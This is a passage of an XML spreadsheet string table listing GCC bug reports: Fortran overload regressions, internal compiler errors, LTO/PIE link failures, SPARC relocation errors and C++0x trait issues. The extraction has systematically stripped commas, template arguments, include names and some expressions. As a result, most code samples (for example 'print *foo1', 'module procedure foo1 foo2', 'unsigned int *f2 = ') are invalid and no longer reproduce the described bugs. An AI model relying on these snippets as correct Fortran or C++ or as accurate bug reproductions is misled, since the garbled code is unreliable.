as: Error: /var/tmp//ccfiHqDu.s line 96: Overflow: 1099511627808
      .frame $fp1099511627808$31
as: Error: /var/tmp//ccfiHqDu.s line 145: Overflow: 1099511627840
      .frame $fp1099511627840$31</t>
  </si>
  <si>
    <t>GCC-26716</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] gfortran: incorrect choice of overloaded function</t>
  </si>
  <si>
    <t>Compiling and running the code below with gfortran 4.1 or mainline
produces the output
 foo1
 foo2
 foo2
instead of the correct output
 foo1
 foo1
 foo2
This occurs with 4.1 (release) 4.1.1 and mainline.
4.0.3 (prerelease) produces the correct output.
module mod1
  implicit none
  interface foo
     module procedure foo1 foo2
  end interface
contains
  subroutine foo1(bar)
    real bar
    print *foo1
   end subroutine
  subroutine foo2(bar)
    real bar(3)
    print *foo2
  end subroutine
end module mod1
program blah
  use mod1
  implicit none
  real bar(3)
  call foo (1e0)
  call foo (bar(1))
  call foo (bar)
end program</t>
  </si>
  <si>
    <t>GCC-3240</t>
  </si>
  <si>
    <t>sh-elf libstdc++-v3 does not build ICE in extract_insn at recog.c:2173</t>
  </si>
  <si>
    <t xml:space="preserve">	Building gcc for sh-elf results in...
/horton/green/gcj-test/2001-06-17-18.45.14/gcc/gcc/libstdc++-v3/include/bits/std_complex.h: In
   function `std::basic_istream&amp; 
   std::operator&gt;&gt;(std::basic_istream&amp; std::complex&amp;) 
   [with _Tp = float _CharT = char _Traits = std::char_traits]':
/horton/green/gcj-test/2001-06-17-18.45.14/gcc/gcc/libstdc++-v3/src/complex_io.cc:36:   instantiated from here
/horton/green/gcj-test/2001-06-17-18.45.14/gcc/gcc/libstdc++-v3/include/bits/std_complex.h:375: Unrecognizable
   insn:
(insn 157 156 158 (parallel[ 
            (set (mem/s:SF (plus:SI (reg/v/u/f:SI 56)
                        (const_int 4 [0x4])) 0)
                (reg:SF 92))
            (use (reg/v:PSI 48 fpscr))
            (clobber (scratch:SI))
        ] ) -1 (insn_list 156 (nil))
    (expr_list:REG_DEAD (reg:SF 92)
        (expr_list:REG_DEAD (reg/v/u/f:SI 56)
            (expr_list:REG_UNUSED (scratch:SI)
                (nil)))))
/horton/green/gcj-test/2001-06-17-18.45.14/gcc/gcc/libstdc++-v3/include/bits/std_complex.h:375: Internal
   compiler error in extract_insn at recog.c:2173
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1 20010617 (experimental)
Environment:
System: Linux fencer.cygnus.com 2.2.12-20smp #1 SMP Mon Sep 27 10:34:45 EDT 1999 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: sh-unknown-elf
configured with: /horton/green/gcj-test/2001-06-17-18.45.14/gcc/gcc/configure --prefix=/horton/green/gcj-test/2001-06-17-18.45.14/sh-elf/install --program-prefix=sh-elf- --target=sh-elf --with-gnu-as --with-gnu-ld
How-To-Repeat:
	Check out the latest gcc code configure for sh-elf and build.</t>
  </si>
  <si>
    <t>GCC-6151</t>
  </si>
  <si>
    <t>Bug#108036: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 108036-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6117: Bug#108036: Info received and FILED only)</t>
  </si>
  <si>
    <t>GCC-8439</t>
  </si>
  <si>
    <t>[3.2 regression] empty struct causes crash</t>
  </si>
  <si>
    <t>c.c: In function `foobar':
c.c:7: Internal compiler error in instantiate_virtual_regs_1 at function.c:4126
Release:
gcc-3.2
Environment:
Linux 2.4.18-PPP i686glibc-2.2.4-18.7.0.6
How-To-Repeat:
gcc -c c.c</t>
  </si>
  <si>
    <t>rf13</t>
  </si>
  <si>
    <t>GCC-70597</t>
  </si>
  <si>
    <t>[6/7 Regression] cmd/go: deduplicate gccgo afiles by package path not *Package</t>
  </si>
  <si>
    <t>see https://go-review.googlesource.com/#/c/21692/
fixes building the golang-goprotobuf package with gccgo which worked with GCC 5.
original report at https://bugs.launchpad.net/ubuntu/+source/gccgo-6/+bug/1566552</t>
  </si>
  <si>
    <t>GCC-25938</t>
  </si>
  <si>
    <t>[4.2 regression] libgomp installs header files in version and target independent location</t>
  </si>
  <si>
    <t>libgomp installs the following headers files into $PREFIX/include:
  omp.h
  omp_lib.f90
  omp_lib.h
(if Fortran is not build more if Fortran is built).
This does not allow one to install several versions of GCC into the
same prefix using --program-suffix.
Note that the C++ headers for example handle this very nicely by
using $PREFIX/include/c++/4.2.0/.
This is a regression introduced with the addition of libgomp.</t>
  </si>
  <si>
    <t>GCC-70258</t>
  </si>
  <si>
    <t>[6 Regression] flag_pic is cleared for PIE in lto_post_options</t>
  </si>
  <si>
    <t>When GCC is configured with --enable-default-pie I got
[hjl@gnu-skl-1 gcc]$ /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/      -fno-diagnostics-show-caret -fdiagnostics-color=never  -O0 -flto -flto-partition=none -fuse-linker-plugin  -c -o c_lto_20081024_0.o /export/gnu/import/git/sources/gcc/gcc/testsuite/gcc.dg/lto/20081024_0.c
[hjl@gnu-skl-1 gcc]$ /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/ c_lto_20081024_0.o -fno-diagnostics-show-caret -fdiagnostics-color=never  -O0 -flto -flto-partition=none -fuse-linker-plugin -o gcc-dg-lto-20081024-01.exe -v
Reading specs from /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/specs
COLLECT_GCC=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/xgcc
COLLECT_LTO_WRAPPER=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/gnu/import/git/sources/gcc/configure --enable-languages=cc++ --disable-bootstrap --disable-libcc1 --disable-libcilkrts --disable-libsanitizer --disable-libmpx --prefix=/usr/gcc-6.0.0 --with-local-prefix=/usr/local --enable-gnu-indirect-function --enable-clocale=gnu --with-system-zlib --enable-default-pie --with-fpmath=sse
Thread model: posix
gcc version 6.0.0 20160316 (experimental) (GCC) 
COMPILER_PATH=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/
LIBRARY_PATH=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/:/lib/../lib64/:/usr/lib/../lib64/:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-fdiagnostics-color=never' '-B' '/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/' '-fno-diagnostics-show-caret' '-O0' '-flto' '-flto-partition=none' '-fuse-linker-plugin' '-o' 'gcc-dg-lto-20081024-01.exe' '-v' '-mtune=generic' '-march=x86-64'
 /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/collect2 -plugin /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/liblto_plugin.so -plugin-opt=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/lto-wrapper -plugin-opt=-fresolution=/tmp/ccfxn1F0.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s -plugin-opt=-pass-through=-lc -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s -flto --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -o gcc-dg-lto-20081024-01.exe /lib/../lib64/Scrt1.o /lib/../lib64/crti.o /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/crtbeginS.o -L/export/build/gnu/gcc-pie/build-x86_64-linux/gcc -L/lib/../lib64 -L/usr/lib/../lib64 c_lto_20081024_0.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/crtendS.o /lib/../lib64/crtn.o
/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/xgcc @/tmp/cc5z5itP
Reading specs from /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/specs
COLLECT_GCC=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/xgcc
Target: x86_64-pc-linux-gnu
Configured with: /export/gnu/import/git/sources/gcc/configure --enable-languages=cc++ --disable-bootstrap --disable-libcc1 --disable-libcilkrts --disable-libsanitizer --disable-libmpx --prefix=/usr/gcc-6.0.0 --with-local-prefix=/usr/local --enable-gnu-indirect-function --enable-clocale=gnu --with-system-zlib --enable-default-pie --with-fpmath=sse
Thread model: posix
gcc version 6.0.0 20160316 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-fdiagnostics-color=never' '-c' '-fmath-errno' '-fsigned-zeros' '-ftrapping-math' '-fno-trapv' '-fno-strict-overflow' '-fno-openmp' '-fno-openacc' '-mtune=generic' '-march=x86-64' '-O0' '-B' '/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/' '-fno-diagnostics-show-caret' '-O0' '-flto-partition=none' '-fuse-linker-plugin' '-v' '-mtune=generic' '-march=x86-64' '-dumpdir' './' '-dumpbase' 'gcc-dg-lto-20081024-01.exe' '-o' '/tmp/ccxq1b5Z.lto.o' '-fresolution=/tmp/ccfxn1F0.res' '-flinker-output=pie'
 /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/lto1 -quiet -dumpdir ./ -dumpbase gcc-dg-lto-20081024-01.exe -mtune=generic -march=x86-64 -mtune=generic -march=x86-64 -auxbase-strip /tmp/ccxq1b5Z.lto.o -O0 -O0 -version -fdiagnostics-color=never -fmath-errno -fsigned-zeros -ftrapping-math -fno-trapv -fno-strict-overflow -fno-openmp -fno-openacc -fno-diagnostics-show-caret -flto-partition=none -fuse-linker-plugin -fresolution=/tmp/ccfxn1F0.res -flinker-output=pie @/tmp/cc40jC1Z -o /tmp/ccXhR3pP.s
GNU GIMPLE (GCC) version 6.0.0 20160316 (experimental) (x86_64-pc-linux-gnu)
	compiled by GNU C version 5.3.1 20160212 (Red Hat 5.3.1-4) GMP version 6.0.0 MPFR version 3.1.3 MPC version 1.0.2 isl version 0.14 or 0.13
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU GIMPLE (GCC) version 6.0.0 20160316 (experimental) (x86_64-pc-linux-gnu)
	compiled by GNU C version 5.3.1 20160212 (Red Hat 5.3.1-4) GMP version 6.0.0 MPFR version 3.1.3 MPC version 1.0.2 isl version 0.14 or 0.13
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
COLLECT_GCC_OPTIONS='-fdiagnostics-color=never' '-c' '-fmath-errno' '-fsigned-zeros' '-ftrapping-math' '-fno-trapv' '-fno-strict-overflow' '-fno-openmp' '-fno-openacc' '-mtune=generic' '-march=x86-64' '-O0' '-B' '/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/' '-fno-diagnostics-show-caret' '-O0' '-flto-partition=none' '-fuse-linker-plugin' '-v' '-mtune=generic' '-march=x86-64' '-dumpdir' './' '-dumpbase' 'gcc-dg-lto-20081024-01.exe' '-o' '/tmp/ccxq1b5Z.lto.o' '-fresolution=/tmp/ccfxn1F0.res' '-flinker-output=pie'
 /export/build/gnu/gcc-pie/build-x86_64-linux/gcc/as -v --64 -o /tmp/ccxq1b5Z.lto.o /tmp/ccXhR3pP.s
GNU assembler version 2.26.51.0.2 (x86_64-pc-linux-gnu) using BFD version (Linux/GNU Binutils) 2.26.51.0.2.20160316
COMPILER_PATH=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/:/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/
LIBRARY_PATH=/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/:/lib/../lib64/../lib64/:/usr/lib/../lib64/../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/:/lib/../lib64/:/usr/lib/../lib64/:/lib/:/usr/lib/:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-fdiagnostics-color=never' '-c' '-fmath-errno' '-fsigned-zeros' '-ftrapping-math' '-fno-trapv' '-fno-strict-overflow' '-fno-openmp' '-fno-openacc' '-mtune=generic' '-march=x86-64' '-O0' '-B' '/export/build/gnu/gcc-pie/build-x86_64-linux/gcc/' '-fno-diagnostics-show-caret' '-O0' '-flto-partition=none' '-fuse-linker-plugin' '-v' '-mtune=generic' '-march=x86-64' '-dumpdir' './' '-dumpbase' 'gcc-dg-lto-20081024-01.exe' '-o' '/tmp/ccxq1b5Z.lto.o' '-fresolution=/tmp/ccfxn1F0.res' '-flinker-output=pie'
/usr/local/bin/ld: /tmp/ccxq1b5Z.lto.o: relocation R_X86_64_32 against `.bss' can not be used when making a shared object recompile with -fPIC
/tmp/ccxq1b5Z.lto.o: error adding symbols: Bad value
collect2: error: ld returned 1 exit status
[hjl@gnu-skl-1 gcc]$ 
The problem is -fPIE isn't passed to lto.</t>
  </si>
  <si>
    <t>GCC-353</t>
  </si>
  <si>
    <t>gcc reports both existence and non existence of constructor  of  template class.correct error message for legal template code with method pointer</t>
  </si>
  <si>
    <t>gcc gave  following error messages
no matching function for call to `Y::Y (int (X::*)())'
candidates are:  Y::Y(int ( X::*)()) 
                 Y::Y(const Y &amp;)
for following program
struct X{
  int blah()
}
template
struct Y{
  T X::* t_
  Y(T X::* t): t_(t){}
}
Y y1(
Release:
unknown
Environment:
gcc 2.95.2 on intel linux.
How-To-Repeat:
compile.</t>
  </si>
  <si>
    <t>brussee</t>
  </si>
  <si>
    <t>GCC-2481</t>
  </si>
  <si>
    <t>Internal compiler error in `change_address' at emit-rtl.c:1584</t>
  </si>
  <si>
    <t>I have downloaded the glibc-2.2.1 package. 
the configure command used: ../glibc-2.2.1/configure --disable-shared --disable-sanity-checks --prefix=/usr/ubivatur/build-2.2.1/install --exec-prefix=/usr/ubivatur/build-2.2.1 --target=ia64-linux
make command: make
After a while I get this error mesg:
../sysdeps/generic/s_cpow.c: In function `__cpow':
../sysdeps/generic/s_cpow.c:28: Internal compiler error in `change_address' at emit-rtl.c:1584
Please submit a full bug report.
See  for instructions.
command-line: gcc s_cpow.i -c -Wall -Winline -Wstrict-prototypes -Wwrite-strings -g -Wno-uninitialized  -o s_cpow.o
Release:
gcc version 2.96-ia64-000717 snap 001117
Environment:
Linux IA64 2.4 TurboLinux
How-To-Repeat:
use the command-line specified in Description part. This file (s_cpow.c) is part of the glibc-2.2.1 sources (sysdeps/generic/s_cpow.c).</t>
  </si>
  <si>
    <t>uday.b.ivaturi</t>
  </si>
  <si>
    <t>GCC-41421</t>
  </si>
  <si>
    <t>[C++0x] Trivial types should require trivial default constructor.</t>
  </si>
  <si>
    <t>The C++0x standard draft defines a trivial type as one that has trivial default construct copy constructor copy assignment operator and destructor. g++ from the current trunk however classifies types without default constructor as trivial meaning that the following code does not compile:
    #include 
    struct Foo {
        Foo(int) {}
    }
    static_assert(!std::is_trivial::value
                  Not trivial - no (trivial) default constructor.)
This seems like a bug (unless I've misunderstood the draft or missed some pending change to it).</t>
  </si>
  <si>
    <t>cadaker</t>
  </si>
  <si>
    <t>GCC-71752</t>
  </si>
  <si>
    <t>[7 Regression] ICE in compute_live_loop_exits at tree-ssa-loop-manip.c:229 w/ -O1 -ftree-vectorize</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160703 ICEs when compiling the following reduced testcase w/ -O1 (-O2 -O3 -Ofast) -ftree-vectorize:
% x86_64-pc-linux-gnu-gcc-7.0.0-alpha20160703 -c -O1 -ftree-vectorize foutgowu.c
foutgowu.c: In function 'w6':
foutgowu.c:4:1: internal compiler error: in compute_live_loop_exits at tree-ssa-loop-manip.c:229
 w6 (unsigned int z5 unsigned int jv)
 ^~
unsigned int q4 yg
void
w6 (unsigned int z5 unsigned int jv)
{
  unsigned int *f2 = 
  while (*f2 &lt; 21)
    {
      q4 -= jv
      z5 -= jv
      f2 = 
      ++(*f2)
    }
  if (z5 != 0)
    for ()
      {
      }
}</t>
  </si>
  <si>
    <t>GCC-18369</t>
  </si>
  <si>
    <t>[4.0 regression] Segfault on braced new</t>
  </si>
  <si>
    <t>=== Cut === 
void breakme() 
{ 
  int* v =new (int [5]) 
} 
=== Cut === 
GNU C++ version 4.0.0 20041107 (experimental) (i686-pc-linux-gnu) 
        compiled by GNU C version 4.0.0 20041107 (experimental). 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
test.cpp: In function void breakme(): 
test.cpp:4: internal compiler error: Segmentation fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-47313</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: PHI argument is not a GIMPLE value</t>
  </si>
  <si>
    <t>$ g++ -O2 -c a.cc
a.cc: In function 'Periodic_3_Delaunay_triangulation_3 &gt;::Vertex_handle Periodic_3_Delaunay_triangulation_3 &gt;::nearest_vertex() const [with  = Triangulation_data_structure_3 Periodic_3_Delaunay_triangulation_3 &gt;::Vertex_handle = internal::CC_iterator false&gt;]':
a.cc:51:1: error: PHI argument is not a GIMPLE value
iftmp.0_2 = PHI (2) D.2301_3(D)(3)&gt;
a.cc:51:1: internal compiler error: verify_stmts failed</t>
  </si>
  <si>
    <t>GCC-20849</t>
  </si>
  <si>
    <t>EXTERNAL and default initialization conflict</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
REAL EXTERNAL :: X=0
END</t>
  </si>
  <si>
    <t>GCC-15267</t>
  </si>
  <si>
    <t>libgcc_s.so.1 fails to link on Solaris 8/SPARC with GNU as 2.14.91</t>
  </si>
  <si>
    <t>Trying to bootstrap the 3.4 branch (or mainline) on Solaris 8/SPARC with
GNU as 2.14.91 (or 2.14) fails linking libgcc_s.so.1:
./xgcc -B./ -B/vol/gcc/share/sparc-sun-solaris2.8/bin/ -isystem /vol/gcc/share/sparc-sun-solaris2.8/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/sys-include -L/vol/gcc/obj/gcc-3.4.1-20040503/8-gcc-gas/gcc/../ld -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -shared -nodefaultlibs -Wl-hlibgcc_s.so.1 -Wl-ztext -Wl-zdefs -Wl-Mlibgcc/./libgcc.map -o libgcc_s.so.1   libgcc/./_muldi3.o libgcc/./_negdi2.o libgcc/./_lshrdi3.o libgcc/./_ashldi3.o libgcc/./_ashrdi3.o libgcc/./_cmpdi2.o libgcc/./_ucmpdi2.o libgcc/./_floatdidf.o libgcc/./_floatdisf.o libgcc/./_fixunsdfsi.o libgcc/./_fixunssfsi.o libgcc/./_fixunsdfdi.o libgcc/./_fixdfdi.o libgcc/./_fixunssfdi.o libgcc/./_fixsfdi.o libgcc/./_fixxfdi.o libgcc/./_fixunsxfdi.o libgcc/./_floatdixf.o libgcc/./_fixunsxfsi.o libgcc/./_fixtfdi.o libgcc/./_fixunstfdi.o libgcc/./_floatdi!
 tf.o libgcc/./_clear_cache.o libgcc/./_trampoline.o libgcc/./__main.o libgcc/./_absvsi2.o libgcc/./_absvdi2.o libgcc/./_addvsi3.o libgcc/./_addvdi3.o libgcc/./_subvsi3.o libgcc/./_subvdi3.o libgcc/./_mulvsi3.o libgcc/./_mulvdi3.o libgcc/./_negvsi2.o libgcc/./_negvdi2.o libgcc/./_ctors.o libgcc/./_ffssi2.o libgcc/./_ffsdi2.o libgcc/./_clz.o libgcc/./_clzsi2.o libgcc/./_clzdi2.o libgcc/./_ctzsi2.o libgcc/./_ctzdi2.o libgcc/./_popcount_tab.o libgcc/./_popcountsi2.o libgcc/./_popcountdi2.o libgcc/./_paritysi2.o libgcc/./_paritydi2.o libgcc/./_divdi3.o libgcc/./_moddi3.o libgcc/./_udivdi3.o libgcc/./_umoddi3.o libgcc/./_udiv_w_sdiv.o libgcc/./_udivmoddi4.o  libgcc/./unwind-dw2.o libgcc/./unwind-dw2-fde.o libgcc/./unwind-sjlj.o libgcc/./gthr-gnat.o libgcc/./unwind-c.o -lc &amp;&amp; rm -f libgcc_s.so &amp;&amp; ln -s libgcc_s.so.1 libgcc_s.so
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_muldi3.o: symbol : offset 0xfeaf6e39 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_negdi2.o: symbol : offset 0xfeaf6ead is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_lshrdi3.o: symbol : offset 0xfeaf6f1b is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ashldi3.o: symbol : offset 0xfeaf6fa2 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ashrdi3.o: symbol : offset 0xfeaf7029 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ucmpdi2.o: symbol : offset 0xfeaf7123 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_floatdidf.o: symbol : offset 0xfeaf7196 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_floatdisf.o: symbol : offset 0xfeaf720f is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixunsdfsi.o: symbol : offset 0xfeaf72af is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixunssfsi.o: symbol : offset 0xfeaf7326 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixunsdfdi.o: symbol : offset 0xfeaf739d is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixdfdi.o: symbol : offset 0xfeaf7415 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixunssfdi.o: symbol : offset 0xfeaf748d is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixsfdi.o: symbol : offset 0xfeaf750e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixtfdi.o: symbol : offset 0xfeaf75ee is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_fixunstfdi.o: symbol : offset 0xfeaf7667 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_clear_cache.o: symbol : offset 0xfeaf7765 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_trampoline.o: symbol : offset 0xfeaf77c5 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_absvsi2.o: symbol : offset 0xfeaf784f is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_absvdi2.o: symbol : offset 0xfeaf78bf is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_addvdi3.o: symbol : offset 0xfeaf79a2 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_subvsi3.o: symbol : offset 0xfeaf7a17 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_mulvsi3.o: symbol : offset 0xfeaf7b01 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_negvsi2.o: symbol : offset 0xfeaf7c2f is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_negvdi2.o: symbol : offset 0xfeaf7ca1 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ffssi2.o: symbol : offset 0xfeaf7d3d is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ffsdi2.o: symbol : offset 0xfeaf7dbf is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_clzsi2.o: symbol : offset 0xfeaf7ea2 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_clzdi2.o: symbol : offset 0xfeaf7f23 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_ctzsi2.o: symbol : offset 0xfeaf7fa3 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_popcountsi2.o: symbol : offset 0xfeaf80f3 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_popcountdi2.o: symbol : offset 0xfeaf8165 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_paritysi2.o: symbol : offset 0xfeaf81d7 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_paritydi2.o: symbol : offset 0xfeaf8249 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_udivdi3.o: symbol : offset 0xfeaf848e is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_umoddi3.o: symbol : offset 0xfeaf8562 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_udiv_w_sdiv.o: symbol : offset 0xfeaf8627 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./_udivmoddi4.o: symbol : offset 0xfeaf86a2 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./unwind-dw2.o: symbol : offset 0xfeaf87f5 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./unwind-dw2-fde.o: symbol : offset 0xfeaf8ed3 is non-aligned
ld: fatal: relocation error: R_SPARC_32: file libgcc/./gthr-gnat.o: symbol : offset 0xfeaf9445 is non-aligned
collect2: ld returned 1 exit status
make[3]: *** [libgcc_s.so] Error 1
As analysed in http://gcc.gnu.org/ml/gcc-patches/2004-04/msg01791.html
this seems to be a gas bug.
Environment:
System: SunOS padouk 5.8 Generic_108528-23 sun4u sparc SUNWSun-Fire-880
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: /vol/gnu/src/gcc/gcc-3.4-branch-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --with-gnu-as --with-as=/vol/gcc/lib/gas-2.14.91
How-To-Repeat:
Try bootstrapping on sparc-sun-solaris2.8 with GNU as as described above.</t>
  </si>
  <si>
    <t>GCC-25343</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6/4.7 regression] [m68k] testsuite failures</t>
  </si>
  <si>
    <t>on m68k-linux the following test cases did fail until 4.0 20051001 did not fail with 20051023 20051111 and start to fail with 20051201 again. No test results exist where these test cases succeed on the 4.1 branch.
+FAIL: gcc.c-torture/execute/ashldi-1.c execution  -O0
+FAIL: gcc.c-torture/execute/ashrdi-1.c execution  -O0
+FAIL: gcc.c-torture/execute/builtin-bitops-1.c execution  -O0
+FAIL: largefile.c -O0 -g (test for excess errors)
+FAIL: largefile.c  -O0  (test for excess errors)
+FAIL: largefile.c  -O1  (test for excess errors)
+FAIL: largefile.c  -O2  (test for excess errors)
+FAIL: largefile.c  -O3 -fomit-frame-pointer  (test for excess errors)
+FAIL: largefile.c  -O3 -g  (test for excess errors)
+FAIL: largefile.c  -Os  (test for excess errors)
config.log:
largefile.c:1: fatal error: had to relocate PCH
compilation terminated.
compiler exited with status 1
output is:
largefile.c:1: fatal error: had to relocate PCH
compilation terminated.</t>
  </si>
  <si>
    <t>GCC-4784</t>
  </si>
  <si>
    <t>Anonymous structs issues</t>
  </si>
  <si>
    <t>Where anonymous members of structures and unions are used GCC fails
to detect whether this might lead to multiple interpretations of a
field name.
Release:
3.1 20011103 (experimental)
Environment:
System: Linux digraph 2.2.19 #1 Sun Oct 21 10:19:10 UTC 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-cvs/configure --prefix=/opt/gcc/mainline --disable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Some examples in
http://gcc.gnu.org/ml/gcc-patches/2001-10/msg00149.html
(see also the rest of that thread).</t>
  </si>
  <si>
    <t>GCC-37465</t>
  </si>
  <si>
    <t>ctors never override virtual functions</t>
  </si>
  <si>
    <t>class A {
 virtual int B() { return 0 }
}
class B: A {
 B() { }
}
gives an error but should compile (as gross as it is).  I'm hoping there is a prohibition against it but didn't find one.</t>
  </si>
  <si>
    <t>GCC-2434</t>
  </si>
  <si>
    <t>Compilation with large file support (solaris &amp; aix)</t>
  </si>
  <si>
    <t>When compiling C++ programs using the flags for 64-bits 
filesystems and large files support on solaris and
aix  macros redefining I/O routines to their 64-bits
counter-part causes the compilation to fail.
Release:
2.95.2 / 2.95.3
Environment:
sparc-sun-solaris2.7
powerpc-ibm-aix4.3.3.0
How-To-Repeat:
on solaris :
g++ `getconf LFS_CFLAGS` -c -I. DummyFile.C fails to 
compile properly.
Error message:
DummyFile.C:25: no `void DummyFile::open64()' member function declared in class `DummyFile'
Same thing on AIX systems with compilation flags :
'-D_LARGE_FILES -D_LARGE_FILE_API'</t>
  </si>
  <si>
    <t>GCC-64943</t>
  </si>
  <si>
    <t>No error on ultimate allocatable components in IO list</t>
  </si>
  <si>
    <t>With this wrong code (other brand: Variables containing ultimate allocatable array components are forbidden from appearing directly in input/output lists.
print * TestReference([Test(99) Test(199)])):
  type :: Test
    integer :: i
  end type
  type :: TestReference
     class(Test) allocatable :: test(:)
  end type
print * TestReference([Test(99) Test(199)])
end
5.0 gives:
f951: internal compiler error: Bad IO basetype (7)
0x62a1fb gfc_internal_error(char const* ...)
	../../trunk/gcc/fortran/error.c:1486
0x71738b transfer_expr
	../../trunk/gcc/fortran/trans-io.c:2265
0x71724a transfer_expr
